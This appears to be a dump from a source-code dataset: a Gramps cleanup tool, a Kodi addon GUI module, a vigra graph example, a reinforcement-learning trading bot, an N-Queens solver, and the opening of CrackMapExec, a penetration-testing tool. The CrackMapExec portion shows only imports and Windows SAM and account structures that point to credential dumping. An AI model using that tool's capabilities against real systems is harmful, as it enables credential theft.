'places' : {'get_func': self.db.get_place_from_handle,
'remove' : self.db.remove_place,
'get_text': None,
'editor' : 'EditPlace',
'stock' : 'gramps-place',
'name_ix' : 2},
'media' : {'get_func': self.db.get_object_from_handle,
'remove' : self.db.remove_object,
'get_text': None,
'editor' : 'EditMedia',
'stock' : 'gramps-media',
'name_ix' : 4},
'repos' : {'get_func': self.db.get_repository_from_handle,
'remove' : self.db.remove_repository,
'get_text': None,
'editor' : 'EditRepository',
'stock' : 'gramps-repository',
'name_ix' : 3},
'notes' : {'get_func': self.db.get_note_from_handle,
'remove' : self.db.remove_note,
'get_text': self.get_note_text,
'editor' : 'EditNote',
'stock' : 'gramps-notes',
'name_ix' : 2},
}
self.init_gui()
def init_gui(self):
self.top = Glade()
window = self.top.toplevel
self.set_window(window, self.top.get_object('title'), self.title)
self.events_box = self.top.get_object('events_box')
self.sources_box = self.top.get_object('sources_box')
self.places_box = self.top.get_object('places_box')
self.media_box = self.top.get_object('media_box')
self.repos_box = self.top.get_object('repos_box')
self.notes_box = self.top.get_object('notes_box')
self.find_button = self.top.get_object('find_button')
self.remove_button = self.top.get_object('remove_button')
self.events_box.set_active(self.options.handler.options_dict['events'])
self.sources_box.set_active(
self.options.handler.options_dict['sources'])
self.places_box.set_active(
self.options.handler.options_dict['places'])
self.media_box.set_active(self.options.handler.options_dict['media'])
self.repos_box.set_active(self.options.handler.options_dict['repos'])
self.notes_box.set_active(self.options.handler.options_dict['notes'])
self.warn_tree = self.top.get_object('warn_tree')
self.warn_tree.connect('button_press_event', self.double_click)
self.selection = self.warn_tree.get_selection()
self.mark_button = self.top.get_object('mark_button')
self.mark_button.connect('clicked', self.mark_clicked)
self.unmark_button = self.top.get_object('unmark_button')
self.unmark_button.connect('clicked', self.unmark_clicked)
self.invert_button = self.top.get_object('invert_button')
self.invert_button.connect('clicked', self.invert_clicked)
self.real_model = Gtk.ListStore(GObject.TYPE_BOOLEAN,
GObject.TYPE_STRING,
GObject.TYPE_STRING,
GObject.TYPE_STRING,
GObject.TYPE_STRING)
self.sort_model = self.real_model.sort_new_with_model()
self.warn_tree.set_model(self.sort_model)
self.renderer = Gtk.CellRendererText()
self.img_renderer = Gtk.CellRendererPixbuf()
self.bool_renderer = Gtk.CellRendererToggle()
self.bool_renderer.connect('toggled', self.selection_toggled)
# Add mark column
mark_column = Gtk.TreeViewColumn(_('Mark'), self.bool_renderer,
active=RemoveUnused.MARK_COL)
mark_column.set_sort_column_id(RemoveUnused.MARK_COL)
self.warn_tree.append_column(mark_column)
# Add image column
img_column = Gtk.TreeViewColumn(None, self.img_renderer )
img_column.set_cell_data_func(self.img_renderer, self.get_image)
self.warn_tree.append_column(img_column)
# Add column with object gramps_id
id_column = Gtk.TreeViewColumn(_('ID'), self.renderer,
text=RemoveUnused.OBJ_ID_COL)
id_column.set_sort_column_id(RemoveUnused.OBJ_ID_COL)
self.warn_tree.append_column(id_column)
# Add column with object name
name_column = Gtk.TreeViewColumn(_('Name'), self.renderer,
text=RemoveUnused.OBJ_NAME_COL)
name_column.set_sort_column_id(RemoveUnused.OBJ_NAME_COL)
self.warn_tree.append_column(name_column)
self.top.connect_signals({
"destroy_passed_object" : self.close,
"on_remove_button_clicked": self.do_remove,
"on_find_button_clicked" : self.find,
"on_delete_event" : self.close,
})
self.dc_label = self.top.get_object('dc_label')
self.sensitive_list = [self.warn_tree, self.mark_button,
self.unmark_button, self.invert_button,
self.dc_label, self.remove_button]
for item in self.sensitive_list:
item.set_sensitive(False)
self.show()
def build_menu_names(self, obj):
return (self.title, None)
def find(self, obj):
self.options.handler.options_dict.update(
events = self.events_box.get_active(),
sources = self.sources_box.get_active(),
places = self.places_box.get_active(),
media = self.media_box.get_active(),
repos = self.repos_box.get_active(),
notes = self.notes_box.get_active(),
)
for item in self.sensitive_list:
item.set_sensitive(True)
self.uistate.set_busy_cursor(True)
self.uistate.progress.show()
self.window.get_window().set_cursor(Gdk.Cursor.new(Gdk.CursorType.WATCH))
self.real_model.clear()
self.collect_unused()
self.uistate.progress.hide()
self.uistate.set_busy_cursor(False)
self.window.get_window().set_cursor(None)
self.reset()
# Save options
self.options.handler.save_options()
def collect_unused(self):
# Run through all requested tables and check all objects
# for being referenced some place. If not, add_results on them.
db = self.db
tables = (
('events', db.get_event_cursor, db.get_number_of_events),
('sources', db.get_source_cursor, db.get_number_of_sources),
('places', db.get_place_cursor, db.get_number_of_places),
('media', db.get_media_cursor, db.get_number_of_media_objects),
('repos', db.get_repository_cursor, db.get_number_of_repositories),
('notes', db.get_note_cursor, db.get_number_of_notes),
)
for (the_type, cursor_func, total_func) in tables:
if not self.options.handler.options_dict[the_type]:
# This table was not requested. Skip it.
continue
with cursor_func() as cursor:
self.set_total(total_func())
fbh = db.find_backlink_handles
for handle, data in cursor:
if not any(h for h in fbh(handle)):
self.add_results((the_type, handle, data))
self.update()
self.reset()
def do_remove(self, obj):
with DbTxn(_("Remove unused objects"), self.db, batch=False) as trans:
self.db.disable_signals()
for row_num in range(len(self.real_model)-1, -1, -1):
path = (row_num,)
row = self.real_model[path]
if not row[RemoveUnused.MARK_COL]:
continue
the_type = row[RemoveUnused.OBJ_TYPE_COL]
handle = row[RemoveUnused.OBJ_HANDLE_COL]
remove_func = self.tables[the_type]['remove']
remove_func(handle, trans)
self.real_model.remove(row.iter)
self.db.enable_signals()
self.db.request_rebuild()
def selection_toggled(self, cell, path_string):
sort_path = tuple(map(int, path_string.split(':')))
real_path = self.sort_model.convert_path_to_child_path(Gtk.TreePath(sort_path))
row = self.real_model[real_path]
row[RemoveUnused.MARK_COL] = not row[RemoveUnused.MARK_COL]
self.real_model.row_changed(real_path, row.iter)
def mark_clicked(self, mark_button):
for row_num in range(len(self.real_model)):
path = (row_num,)
row = self.real_model[path]
row[RemoveUnused.MARK_COL] = True
def unmark_clicked(self, unmark_button):
for row_num in range(len(self.real_model)):
path = (row_num,)
row = self.real_model[path]
row[RemoveUnused.MARK_COL] = False
def invert_clicked(self, invert_button):
for row_num in range(len(self.real_model)):
path = (row_num,)
row = self.real_model[path]
row[RemoveUnused.MARK_COL] = not row[RemoveUnused.MARK_COL]
def double_click(self, obj, event):
if event.type == Gdk.EventType._2BUTTON_PRESS and event.button == 1:
(model, node) = self.selection.get_selected()
if not node:
return
sort_path = self.sort_model.get_path(node)
real_path = self.sort_model.convert_path_to_child_path(sort_path)
row = self.real_model[real_path]
the_type = row[RemoveUnused.OBJ_TYPE_COL]
handle = row[RemoveUnused.OBJ_HANDLE_COL]
self.call_editor(the_type, handle)
def call_editor(self, the_type, handle):
try:
obj = self.tables[the_type]['get_func'](handle)
editor_str = 'from gramps.gui.editors import %s as editor' % (
self.tables[the_type]['editor']
)
exec(editor_str)
editor(self.dbstate, self.uistate, [], obj)
except WindowActiveError:
pass
def get_image(self, column, cell, model, iter, user_data=None):
the_type = model.get_value(iter, RemoveUnused.OBJ_TYPE_COL)
the_stock = self.tables[the_type]['stock']
cell.set_property('stock-id', the_stock)
def add_results(self, results):
(the_type, handle, data) = results
gramps_id = data[1]
# if we have a function that will return to us some type
# of text summary, then we should use it; otherwise we'll
# use the generic field index provided in the tables above
if self.tables[the_type]['get_text']:
text = self.tables[the_type]['get_text'](the_type, handle, data)
else:
# grab the text field index we know about, and hope
# it represents something useful to the user
name_ix = self.tables[the_type]['name_ix']
text = data[name_ix]
# insert a new row into the table
self.real_model.append(row=[False, gramps_id, text, the_type, handle])
def get_event_text(self, the_type, handle, data):
"""
Come up with a short line of text that we can use as
a summary to represent this event.
"""
# get the event:
event = self.tables[the_type]['get_func'](handle)
# first check to see if the event has a descriptive name
text = event.get_description() # (this is rarely set for events)
# if we don't have a description...
if text == '':
# ... then we merge together several fields
# get the event type (marriage, birth, death, etc.)
text = str(event.get_type())
# see if there is a date
date = _dd.display(event.get_date_object())
if date != '':
text += '; %s' % date
# see if there is a place
place_handle = event.get_place_handle()
if place_handle:
place = self.db.get_place_from_handle(place_handle)
text += '; %s' % place.get_title()
return text
def get_note_text(self, the_type, handle, data):
"""
We need just the first few words of a note as a summary.
"""
# get the note object
note = self.tables[the_type]['get_func'](handle)
# get the note text; this ignores (discards) formatting
text = note.get()
# convert whitespace to a single space
text = " ".join(text.split())
# if the note is too long, truncate it
if len(text) > 80:
text = text[:80] + "..."
return text
#------------------------------------------------------------------------
#
#
#
#------------------------------------------------------------------------
class CheckOptions(tool.ToolOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, person_id=None):
tool.ToolOptions.__init__(self, name, person_id)
# Options specific for this report
self.options_dict = {
'events' : 1,
'sources' : 1,
'places' : 1,
'media' : 1,
'repos' : 1,
'notes' : 1,
}
self.options_help = {
'events' : ("=0/1","Whether to use check for unused events",
["Do not check events","Check events"],
True),
'sources' : ("=0/1","Whether to use check for unused sources",
["Do not check sources","Check sources"],
True),
'places' : ("=0/1","Whether to use check for unused places",
["Do not check places","Check places"],
True),
'media' : ("=0/1","Whether to use check for unused media",
["Do not check media","Check media"],
True),
'repos' : ("=0/1","Whether to use check for unused repositories",
["Do not check repositories","Check repositories"],
True),
'notes' : ("=0/1","Whether to use check for unused notes",
["Do not check notes","Check notes"],
True),
}
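#-------------------------------------------------------------------------
#
# Minimal sketch (not part of the plugin) of the core test in
# collect_unused above: an object is unused when the database yields no
# backlink handles for it. `db` and `cursor_func` are hypothetical
# stand-ins for an opened database and one of its cursor factories.
#
#-------------------------------------------------------------------------
def find_unused_handles(db, cursor_func):
    unused = []
    with cursor_func() as cursor:
        for handle, data in cursor:
            if not any(True for _ in db.find_backlink_handles(handle)):
                unused.append(handle)
    return unused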
| gpl-2.0 | -5,002,553,252,887,925,000 | 38.505353 | 87 | 0.525286 | false |
azumimuo/family-xbmc-addon | plugin.video.salts/salts_lib/gui_utils.py | 1 | 13329 | """
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import xbmcgui
import time
import os
import kodi
import random
import json
from utils2 import reset_base_url, i18n
from trakt_api import Trakt_API
from salts_lib import log_utils
use_https = kodi.get_setting('use_https') == 'true'
trakt_timeout = int(kodi.get_setting('trakt_timeout'))
def get_pin():
AUTH_BUTTON = 200
LATER_BUTTON = 201
NEVER_BUTTON = 202
ACTION_PREVIOUS_MENU = 10
ACTION_BACK = 92
CENTER_Y = 6
CENTER_X = 2
class PinAuthDialog(xbmcgui.WindowXMLDialog):
auth = False
def onInit(self):
self.pin_edit_control = self.__add_editcontrol(30, 240, 40, 450)
self.setFocus(self.pin_edit_control)
auth = self.getControl(AUTH_BUTTON)
never = self.getControl(NEVER_BUTTON)
self.pin_edit_control.controlUp(never)
self.pin_edit_control.controlLeft(never)
self.pin_edit_control.controlDown(auth)
self.pin_edit_control.controlRight(auth)
auth.controlUp(self.pin_edit_control)
auth.controlLeft(self.pin_edit_control)
never.controlDown(self.pin_edit_control)
never.controlRight(self.pin_edit_control)
def onAction(self, action):
# print 'Action: %s' % (action.getId())
if action == ACTION_PREVIOUS_MENU or action == ACTION_BACK:
self.close()
def onControl(self, control):
# print 'onControl: %s' % (control)
pass
def onFocus(self, control):
# print 'onFocus: %s' % (control)
pass
def onClick(self, control):
# print 'onClick: %s' % (control)
if control == AUTH_BUTTON:
if not self.__get_token():
kodi.notify(msg=i18n('pin_auth_failed'), duration=5000)
return
self.auth = True
if control == LATER_BUTTON:
kodi.notify(msg=i18n('remind_in_24hrs'), duration=5000)
kodi.set_setting('last_reminder', str(int(time.time())))
if control == NEVER_BUTTON:
kodi.notify(msg=i18n('use_addon_settings'), duration=5000)
kodi.set_setting('last_reminder', '-1')
if control in [AUTH_BUTTON, LATER_BUTTON, NEVER_BUTTON]:
self.close()
def __get_token(self):
pin = self.pin_edit_control.getText().strip()
if pin:
try:
trakt_api = Trakt_API(use_https=use_https, timeout=trakt_timeout)
result = trakt_api.get_token(pin=pin)
kodi.set_setting('trakt_oauth_token', result['access_token'])
kodi.set_setting('trakt_refresh_token', result['refresh_token'])
profile = trakt_api.get_user_profile(cached=False)
kodi.set_setting('trakt_user', '%s (%s)' % (profile['username'], profile['name']))
return True
except Exception as e:
log_utils.log('Trakt Authorization Failed: %s' % (e), log_utils.LOGDEBUG)
return False
return False
        # have to add edit controls programmatically because getControl() hard-crashes XBMC on them
def __add_editcontrol(self, x, y, height, width):
media_path = os.path.join(kodi.get_path(), 'resources', 'skins', 'Default', 'media')
temp = xbmcgui.ControlEdit(0, 0, 0, 0, '', font='font12', textColor='0xFFFFFFFF', focusTexture=os.path.join(media_path, 'button-focus2.png'),
noFocusTexture=os.path.join(media_path, 'button-nofocus.png'), _alignment=CENTER_Y | CENTER_X)
temp.setPosition(x, y)
temp.setHeight(height)
temp.setWidth(width)
self.addControl(temp)
return temp
dialog = PinAuthDialog('TraktPinAuthDialog.xml', kodi.get_path())
dialog.doModal()
if dialog.auth:
kodi.notify(msg=i18n('trakt_auth_complete'), duration=3000)
del dialog
class ProgressDialog(object):
def __init__(self, heading, line1='', line2='', line3='', active=True):
if active:
self.pd = xbmcgui.DialogProgress()
self.pd.create(heading, line1, line2, line3)
self.pd.update(0)
else:
self.pd = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if self.pd is not None:
self.pd.close()
del self.pd
def is_canceled(self):
if self.pd is not None:
return self.pd.iscanceled()
else:
return False
def update(self, percent, line1='', line2='', line3=''):
if self.pd is not None:
self.pd.update(percent, line1, line2, line3)
def perform_auto_conf(responses):
length = len(responses)
TOTAL = 12
if length < TOTAL:
responses += [True] * (TOTAL - length)
if responses[0]: kodi.set_setting('trakt_timeout', '60')
if responses[1]: kodi.set_setting('calendar-day', '-1')
if responses[2]: kodi.set_setting('calendar_time', '2')
if responses[3]: kodi.set_setting('source_timeout', '20')
if responses[4]: kodi.set_setting('include_watchlist_next', 'true')
if responses[5]: kodi.set_setting('filter_direct', 'true')
if responses[6]: kodi.set_setting('filter_unusable', 'true')
if responses[7]: kodi.set_setting('show_debrid', 'true')
if responses[8]: kodi.set_setting('source_results', '0')
if responses[9]:
kodi.set_setting('enable_sort', 'true')
kodi.set_setting('sort1_field', '2')
kodi.set_setting('sort2_field', '5')
kodi.set_setting('sort3_field', '6')
kodi.set_setting('sort4_field', '1')
kodi.set_setting('sort5_field', '3')
kodi.set_setting('sort6_field', '4')
if responses[10]:
tiers = ['Local', 'Furk.net', 'Premiumize.me', 'EasyNews', 'DD.tv', 'NoobRoom',
['WatchHD', 'IFlix', 'MoviesPlanet', 'TVWTVS', '9Movies', '123Movies', 'niter.tv', 'HDMovie14', 'ororo.tv'],
['StreamLord', 'CyberReel', 'MWM', 'tunemovie', 'afdah.org', 'xmovies8', 'xmovies8.v2', 'MovieXK'],
['torba.se', 'Rainierland', 'FardaDownload', 'zumvo.com', 'PutMV', 'MiraDeTodo', 'beinmovie', 'FireMoviesHD'],
['IzlemeyeDeger', 'SezonLukDizi', 'Dizimag', 'Dizilab', 'Dizigold', 'Dizibox', 'Diziay', 'Dizipas', 'OneClickTVShows'],
['DayT.se', 'DDLValley', 'ReleaseBB', 'MyVideoLinks.eu', 'OCW', 'RLSSource.net', 'TVRelease.Net', 'alluc.com'],
['IceFilms', 'WatchEpisodes', 'PrimeWire', 'SantaSeries', 'Flixanity', 'wso.ch', 'WatchSeries', 'UFlix.org', 'Putlocker'],
['funtastic-vids', 'WatchFree.to', 'pftv', 'streamallthis.is', 'Movie4K', 'afdah', 'SolarMovie', 'yify-streaming'],
['MovieSub', 'MovieHut', 'CouchTunerV2', 'CouchTunerV1', 'Watch8Now', 'yshows', 'TwoMovies.us', 'iWatchOnline'],
['vidics.ch', 'pubfilm', 'OnlineMoviesIs', 'OnlineMoviesPro', 'ViewMovies', 'movie25', 'viooz.ac', 'view47', 'MoviesHD'],
['wmo.ch', 'ayyex', 'stream-tv.co', 'clickplay.to', 'MintMovies', 'MovieNight', 'cmz', 'ch131', 'filmikz.ch'],
['MovieTube', 'LosMovies', 'FilmStreaming.in', 'moviestorm.eu', 'MerDB']]
sso = []
random_sso = kodi.get_setting('random_sso') == 'true'
for tier in tiers:
if isinstance(tier, basestring):
sso.append(tier)
else:
if random_sso:
random.shuffle(tier)
sso += tier
kodi.set_setting('source_sort_order', '|'.join(sso))
if responses[11]: reset_base_url()
trigger = [False, True, False, True, False, True, True, False, True, False, False, False]
if all([t == r for t, r in zip(trigger, responses)]):
kodi.set_setting('scraper_download', 'true')
kodi.notify(msg=i18n('auto_conf_complete'))
def do_auto_config():
ACTION_PREVIOUS_MENU = 10
ACTION_BACK = 92
CONTINUE_BUTTON = 200
CANCEL_BUTTON = 201
starty = 60
posx = 30
gap = 35
RADIO_BUTTONS = [
i18n('set_trakt_timeout'),
i18n('set_cal_start'),
i18n('set_cal_airtime'),
i18n('set_scraper_timeout'),
i18n('set_wl_mne'),
i18n('set_test_direct'),
i18n('set_filter_unusable'),
i18n('set_show_debrid'),
i18n('set_no_limit'),
i18n('set_source_sort'),
i18n('set_sso'),
i18n('set_reset_url'),
i18n('select_all_none')]
class AutoConfDialog(xbmcgui.WindowXMLDialog):
def onInit(self):
log_utils.log('onInit:', log_utils.LOGDEBUG)
self.OK = False
self.radio_buttons = []
posy = starty
for label in RADIO_BUTTONS:
self.radio_buttons.append(self.__get_radio_button(posx, posy, label))
posy += gap
try: responses = json.loads(kodi.get_setting('prev_responses'))
except: responses = [True] * len(self.radio_buttons)
if len(responses) < len(self.radio_buttons):
responses += [True] * (len(self.radio_buttons) - len(responses))
self.addControls(self.radio_buttons)
last_button = None
for response, radio_button in zip(responses, self.radio_buttons):
radio_button.setSelected(response)
if last_button is not None:
radio_button.controlUp(last_button)
radio_button.controlLeft(last_button)
last_button.controlDown(radio_button)
last_button.controlRight(radio_button)
last_button = radio_button
continue_ctrl = self.getControl(CONTINUE_BUTTON)
cancel_ctrl = self.getControl(CANCEL_BUTTON)
self.radio_buttons[0].controlUp(cancel_ctrl)
self.radio_buttons[0].controlLeft(cancel_ctrl)
self.radio_buttons[-1].controlDown(continue_ctrl)
self.radio_buttons[-1].controlRight(continue_ctrl)
continue_ctrl.controlUp(self.radio_buttons[-1])
continue_ctrl.controlLeft(self.radio_buttons[-1])
cancel_ctrl.controlDown(self.radio_buttons[0])
cancel_ctrl.controlRight(self.radio_buttons[0])
def __get_radio_button(self, x, y, label):
kwargs = {'font': 'font12', 'focusTexture': 'button-focus2.png', 'noFocusTexture': 'button-nofocus.png', 'focusOnTexture': 'radiobutton-focus.png',
'noFocusOnTexture': 'radiobutton-focus.png', 'focusOffTexture': 'radiobutton-nofocus.png', 'noFocusOffTexture': 'radiobutton-nofocus.png'}
temp = xbmcgui.ControlRadioButton(x, y, 450, 30, label, **kwargs)
return temp
def onAction(self, action):
# log_utils.log('Action: %s' % (action.getId()), log_utils.LOGDEBUG)
if action == ACTION_PREVIOUS_MENU or action == ACTION_BACK:
self.close()
def onControl(self, control):
# log_utils.log('onControl: %s' % (control), log_utils.LOGDEBUG)
pass
def onFocus(self, control):
# log_utils.log('onFocus: %s' % (control), log_utils.LOGDEBUG)
pass
def onClick(self, control):
# log_utils.log('onClick: %s' % (control), log_utils.LOGDEBUG)
focus_button = self.getControl(control)
if focus_button == self.radio_buttons[-1]:
all_status = focus_button.isSelected()
for button in self.radio_buttons:
button.setSelected(all_status)
if control == CONTINUE_BUTTON:
self.OK = True
if control == CANCEL_BUTTON:
self.OK = False
if control == CONTINUE_BUTTON or control == CANCEL_BUTTON:
self.close()
def get_responses(self):
return [bool(button.isSelected()) for button in self.radio_buttons]
dialog = AutoConfDialog('AutoConfDialog.xml', kodi.get_path())
dialog.doModal()
if dialog.OK:
responses = dialog.get_responses()
kodi.set_setting('prev_responses', json.dumps(responses))
perform_auto_conf(responses)
del dialog
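# Sketch (not part of the addon) of the tier flattening performed inside
# perform_auto_conf above: plain strings keep their slot while list tiers
# are optionally shuffled before being appended, so ordering is only ever
# randomized within a tier.
def flatten_tiers(tiers, shuffle_within=False):
    order = []
    for tier in tiers:
        if isinstance(tier, basestring):
            order.append(tier)
        else:
            tier = list(tier)
            if shuffle_within:
                random.shuffle(tier)
            order.extend(tier)
    return order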
| gpl-2.0 | 7,353,126,879,999,772,000 | 41.858521 | 160 | 0.572736 | false |
kod3r/vigra | vigranumpy/examples/rag3d.py | 7 | 1827 | import vigra
from vigra import graphs
from vigra import numpy
from vigra import Timer
iEdgeMap = graphs.implicitMeanEdgeMap
numpy.random.seed(42)
# input
shape = [200, 100, 100]
data = numpy.random.rand(*shape).astype(numpy.float32)
data = vigra.taggedView(data,"xyz")
if False:  # flip to True to (re)build and save the RAG instead of loading it
labels = numpy.random.randint(5, size=shape[0]*shape[1]*shape[2])
labels = labels.reshape(shape).astype(numpy.uint32)
labels = vigra.analysis.labelVolume(labels)
adjListGraph = graphs.listGraph()
gridGraph = graphs.gridGraph(shape)
rag = graphs.regionAdjacencyGraph(gridGraph, labels)
rag.writeHDF5("bla.h5", "dset")
else:
    # load the region adjacency graph
    rag = graphs.loadGridRagHDF5("bla.h5", "dset")
print rag.labels.shape, rag.labels.dtype, type(rag.labels)
print "accumulate edge and node features"
edgeCuesMean = rag.accumulateEdgeFeatures( iEdgeMap(rag.baseGraph, data) )
edgeCuesMean = numpy.array([edgeCuesMean, edgeCuesMean]).T
nodeCuesMean = rag.accumulateNodeFeatures(data)
nodeCuesMean = numpy.array([nodeCuesMean, nodeCuesMean]).T
mergeGraph = graphs.mergeGraph(rag)
featureManager = graphs.NeuroDynamicFeatures(rag, mergeGraph)
# assign features
print "edgeCuesShape", edgeCuesMean.shape
featureManager.assignEdgeCues(edgeCuesMean)
featureManager.assignNodeCues(nodeCuesMean)
featureManager.assignEdgeSizes(rag.edgeLengths())
featureManager.assignNodeSizes(rag.nodeSize())
# register the callback mechainsm
featureManager.registerCallbacks()
mgEdge = mergeGraph.edgeFromId(1)
print "edge features", featureManager.getFeatures( mergeGraph.edgeFromId(27885))
mergeGraph.contractEdge(mgEdge)
print "edge features", featureManager.getFeatures( mergeGraph.edgeFromId(27885))
#for edge in mergeGraph.edgeIter():
# print "edge features", featureManager.getFeatures(edge)
| mit | -5,023,103,974,042,999,000 | 24.732394 | 80 | 0.775041 | false |
terentjew-alexey/market-analysis-system | mas_cryptobot/bot-rl_v0.0.py | 1 | 1653 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from keras.optimizers import Adam
from rl.agents.dqn import DQNAgent
from rl.policy import BoltzmannQPolicy
from rl.memory import SequentialMemory
from mas_tools.envs import MarketEnv
from mas_tools.markets import AbstractMarket
from mas_tools.api import Binance
from mas_tools.models import simple_model
MY_API_KEY = '---'
MY_API_SECRET = '---'
ENV_NAME = 'Binance'
## Init exchange api
api = Binance(API_KEY=MY_API_KEY, API_SECRET=MY_API_SECRET)
## Init market environment
connector = AbstractMarket(api, symbols=['ETHUSDT'], periods='5m', balance=1000.0)
market = MarketEnv(connector)
print('connector shape', connector.shape)
## Environment parameters
observation_shape = market.observation_space.shape
nb_actions = market.action_space.n
print('state =', observation_shape, '| actions =', nb_actions)
## Init ML-model for agent
model = simple_model(observation_shape, nb_actions)
## Init RL-metod parameters
memory = SequentialMemory(limit=10000, window_length=1)
policy = BoltzmannQPolicy()
## Init RL agent
agent = DQNAgent(model=model, nb_actions=nb_actions,
memory=memory, nb_steps_warmup=1000,
target_model_update=1e-2, policy=policy,
# enable_dueling_network=True, dueling_type='avg'
)
agent.compile(Adam(lr=1e-3), metrics=['mae'])
## Train and evaluation
# agent.load_weights('dqn_{}_weights.h5f'.format(ENV_NAME))
agent.fit(market, nb_steps=100000, visualize=False, verbose=2)
agent.save_weights('dqn_{}_weights.h5f'.format(ENV_NAME), overwrite=True)
agent.test(market, nb_episodes=5, visualize=False)
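## Follow-up sketch (not in the original script): a fresh deployment would
## reload the weights saved above before evaluating, mirroring the
## commented-out load_weights call earlier in the file.
# agent.load_weights('dqn_{}_weights.h5f'.format(ENV_NAME))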
| mit | -7,393,049,592,200,415,000 | 28.517857 | 82 | 0.715668 | false |
djsilenceboy/LearnTest | Python_Test/PyCodePractice/com/djs/learn/NQueues.py | 1 | 1882 | '''
@author: Du Jiang
https://leetcode.com/problems/n-queens/description/
'''
class Solution:
    def innerSolveNQueens(self, n, positions, rowNum, validColumns):
        # Depth-first backtracking: positions[r] holds the queen's column
        # for row r, and validColumns tracks columns not yet occupied.
        if rowNum == n:
            self.result.append(["." * positions[i] + "Q" + "." *
                                (n - 1 - positions[i]) for i in range(n)])
            return
        for column in range(n):
            valid = True
            # A candidate column must be unused and not adjacent (same or
            # touching diagonal) to the previous row's queen ...
            if (column in validColumns) and ((rowNum == 0) or (column < positions[rowNum - 1] - 1) or (column > positions[rowNum - 1] + 1)):
                if rowNum > 0:
                    # ... and must not share a diagonal with rows 0..rowNum-2.
                    for k in range(rowNum - 1):
                        if (rowNum - k) == abs(column - positions[k]):
                            valid = False
                            break
            else:
                valid = False
            if valid:
                # Place, recurse one row deeper, then undo (backtrack).
                positions[rowNum] = column
                validColumns.remove(column)
                self.innerSolveNQueens(
                    n, positions, rowNum + 1, validColumns)
                validColumns.add(column)
def solveNQueens(self, n):
"""
:type n: int
:rtype: List[List[str]]
"""
self.result = []
validColumns = {i for i in range(n)}
positions = [-1 for i in range(n)]
self.innerSolveNQueens(n, positions, 0, validColumns)
return self.result
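    # Counting-only variant (not in the original class), built directly on
    # the same backtracking recursion; shown here as a usage sketch.
    def totalNQueens(self, n):
        return len(self.solveNQueens(n))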
def test(n):
solution = Solution()
print("n =", n)
result = solution.solveNQueens(n)
# print("result =", result)
print("result size =", len(result))
print("-" * 80)
def main():
# 2
test(4)
# 10
test(5)
# 4
test(6)
# 40
test(7)
# 92
test(8)
# 352
test(9)
# 724
test(10)
# 2,680
test(11)
# 14,200
test(12)
# 73,712
test(13)
# 365,596
test(14)
if __name__ == '__main__':
main()
| apache-2.0 | -4,831,033,325,880,515,000 | 22.234568 | 140 | 0.469182 | false |
masbog/CrackMapExec | crackmapexec.py | 3 | 117724 | #!/usr/bin/env python2
#This must be one of the first imports or else we get threading error on completion
from gevent import monkey
monkey.patch_all()
from gevent import sleep
from gevent.pool import Pool
from gevent import joinall
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
from threading import Thread
from base64 import b64encode
from struct import unpack, pack
from collections import OrderedDict
from impacket import smbserver, ntlm, winregistry
from impacket.dcerpc.v5 import transport, scmr, samr, drsuapi, rrp, tsch, srvs, wkst, epm
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL, OWNER_SECURITY_INFORMATION
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
from impacket.ese import ESENT_DB
from impacket.structure import Structure
from impacket.nt_errors import STATUS_MORE_ENTRIES
from impacket.nmb import NetBIOSError
from impacket.smbconnection import *
from BaseHTTPServer import BaseHTTPRequestHandler
from argparse import RawTextHelpFormatter
from binascii import unhexlify, hexlify
from Crypto.Cipher import DES, ARC4
from datetime import datetime
from time import ctime, time
from termcolor import cprint, colored
import StringIO
import ntpath
import socket
import hashlib
import BaseHTTPServer
import logging
import argparse
import traceback
import ConfigParser
import random
import sys
import os
import string
PERM_DIR = ''.join(random.sample(string.ascii_letters, 10))
OUTPUT_FILENAME = ''.join(random.sample(string.ascii_letters, 10))
BATCH_FILENAME = ''.join(random.sample(string.ascii_letters, 10)) + '.bat'
SMBSERVER_DIR = 'served_over_smb'
DUMMY_SHARE = 'TMP'
print_error = lambda x: cprint("[-] ", 'red', attrs=['bold'], end=x+'\n')
print_status = lambda x: cprint("[*] ", 'blue', attrs=['bold'], end=x+'\n')
print_succ = lambda x: cprint("[+] ", 'green', attrs=['bold'], end=x+'\n')
print_att = lambda x: cprint(x, 'yellow', attrs=['bold'])
yellow = lambda x: colored(x, 'yellow', attrs=['bold'])
green = lambda x: colored(x, 'green', attrs=['bold'])
red = lambda x: colored(x, 'red', attrs=['bold'])
# Structures
# Taken from http://insecurety.net/?p=768
class SAM_KEY_DATA(Structure):
structure = (
('Revision','<L=0'),
('Length','<L=0'),
('Salt','16s=""'),
('Key','16s=""'),
('CheckSum','16s=""'),
('Reserved','<Q=0'),
)
class DOMAIN_ACCOUNT_F(Structure):
structure = (
('Revision','<L=0'),
('Unknown','<L=0'),
('CreationTime','<Q=0'),
('DomainModifiedCount','<Q=0'),
('MaxPasswordAge','<Q=0'),
('MinPasswordAge','<Q=0'),
('ForceLogoff','<Q=0'),
('LockoutDuration','<Q=0'),
('LockoutObservationWindow','<Q=0'),
('ModifiedCountAtLastPromotion','<Q=0'),
('NextRid','<L=0'),
('PasswordProperties','<L=0'),
('MinPasswordLength','<H=0'),
('PasswordHistoryLength','<H=0'),
('LockoutThreshold','<H=0'),
('Unknown2','<H=0'),
('ServerState','<L=0'),
('ServerRole','<H=0'),
('UasCompatibilityRequired','<H=0'),
('Unknown3','<Q=0'),
('Key0',':', SAM_KEY_DATA),
# Commenting this, not needed and not present on Windows 2000 SP0
# ('Key1',':', SAM_KEY_DATA),
# ('Unknown4','<L=0'),
)
# Great help from here http://www.beginningtoseethelight.org/ntsecurity/index.htm
class USER_ACCOUNT_V(Structure):
structure = (
('Unknown','12s=""'),
('NameOffset','<L=0'),
